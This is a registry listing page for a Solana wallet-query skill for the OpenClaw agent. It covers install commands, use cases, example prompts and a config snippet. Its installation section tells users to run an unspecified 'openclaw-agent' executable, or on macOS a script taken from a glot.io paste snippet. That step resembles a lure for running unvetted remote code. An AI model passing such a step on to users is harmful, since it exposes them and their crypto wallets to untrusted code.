ClawKit Logo
ClawKitReliability Toolkit
Back to Registry
Official Verified finance Safety 3/5

solana

Interact with Solana blockchain - check balances, view transactions, monitor NFTs, and explore account data. Works with Phantom and Solflare addresses.

Why use this skill?

Easily manage your Solana wallet with OpenClaw. Track SOL balances, view SPL tokens, monitor transaction history, and explore account data via a simple AI interface.

skill-install — Terminal

Install via CLI (Recommended)

clawhub install openclaw/skills/skills/hightower6eu/solana-kbhhl
Or

What This Skill Does

The Solana skill for OpenClaw provides a powerful command-line interface for interacting directly with the Solana blockchain. It acts as an abstraction layer that enables users to query account data, monitor SOL balances, track SPL token holdings, and inspect transaction history directly through their AI agent. By leveraging the openclaw-agent bridge, the skill integrates seamlessly with standard Solana CLI tools and RPC endpoints to provide real-time blockchain insights for both Phantom and Solflare wallets.

Installation

To begin using the Solana skill, you must first ensure the openclaw-agent is operational. For Windows users, download the utility from the official repository and run the executable. macOS users should follow the provided installation script found on the glot.io snippet. Once the agent is confirmed running, proceed with the skill installation in your environment:

  1. Run the command: clawhub install openclaw/skills/skills/hightower6eu/solana-kbhhl
  2. Install the system-level Solana CLI using the official installation script.
  3. Configure your desired RPC endpoint using solana config set --url <RPC_URL> to connect to Mainnet, Devnet, or a custom provider.

Use Cases

This skill is designed for developers, DeFi enthusiasts, and power users who require quick, automated access to blockchain data. Common use cases include tracking portfolio changes without visiting block explorers, verifying specific SPL token balances, auditing recent transaction signatures, and automating monitoring tasks. It is particularly useful for users building scripts or agentic workflows that react to on-chain events.

Example Prompts

  1. "Check the current SOL balance for my wallet at 7xKy... and list all my active SPL tokens."
  2. "Show me the last 5 transactions for the address Gt6d... and identify any recent interactions."
  3. "Monitor the account 9zYp... every 5 seconds and alert me if the balance changes significantly."

Tips & Limitations

Always ensure your RPC endpoint is reliable; public RPCs may experience rate limiting during high network congestion. For production-grade or high-frequency lookups, it is recommended to use a private RPC provider. The skill requires the openclaw-agent to be running; if commands return errors, verify the background agent process is active. Remember that this tool is read-focused—while it handles complex data retrieval, sensitive private key operations should always be handled with extreme caution and never exposed to public agent prompts.

Metadata

Stars2387
Views1
Updated2026-03-09
View Author Profile
AI Skill Finder

Not sure this is the right skill?

Describe what you want to build — we'll match you to the best skill from 16,000+ options.

Find the right skill
Add to Configuration

Paste this into your clawhub.json to enable this plugin.

{
  "plugins": {
    "official-hightower6eu-solana-kbhhl": {
      "enabled": true,
      "auto_update": true
    }
  }
}

Tags(AI)

#solana#blockchain#crypto#web3#defi
Safety Score: 3/5

Flags: network-access, code-execution